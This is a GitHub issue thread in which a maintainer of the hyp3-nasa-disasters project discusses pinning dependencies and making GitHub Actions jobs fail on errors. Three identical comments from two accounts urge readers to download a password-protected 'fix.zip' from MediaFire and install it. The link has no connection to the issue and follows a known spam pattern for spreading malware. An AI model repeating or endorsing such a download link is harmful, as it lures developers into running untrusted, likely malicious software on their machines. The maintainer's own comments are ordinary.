### ISSUE TITLE
Make Process and Transfer more robust in hyp3-nasa-disasters (pin dependencies, fail for errors)

### ISSUE THREAD

**Issue by jtherrmann** [ASFHyP3/hyp3-nasa-disasters#129]
**Jira:** https://asfdaac.atlassian.net/browse/TOOL-2989

*Note: The above link is accessible only to members of ASF.*

----------------------------------------------------------------------------------------------------

We should make the process-and-transfer workflow more robust. A recent string of failures that went unnoticed for 3 weeks highlighted two areas for improvement:

1. Move the dependencies for [data_management/environment.yml](https://github.com/ASFHyP3/hyp3-nasa-disasters/blob/main/data_management/environment.yml) to a requirements file, pin the versions, and confirm that dependabot is tracking those requirements. To fix the recent string of failures, I've pinned asf_search in the environment file, but dependabot won't keep track of it.
2. Ensure that errors (e.g. unhandled Python exceptions) within a job cause the job to fail. For example [this run](https://github.com/ASFHyP3/hyp3-nasa-disasters/actions/runs/10559419513) shows 4 successful jobs with 4 "Annotations" for errors caused by an unhandled Python exception. I think there's a GitHub Actions settings to ensure that jobs fail when commands within the job return an error code?

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jtherrmann** [comment]
We'll see if removing the `continue-on-error: true` line in https://github.com/ASFHyP3/hyp3-nasa-disasters/pull/137 causes a regression to <https://github.com/ASFHyP3/hyp3-nasa-disasters/pull/67> (which would cause actions to fail).

**Comment by jtherrmann** [comment]
We should see a dependabot PR opened to bump `asf-search` next Monday.
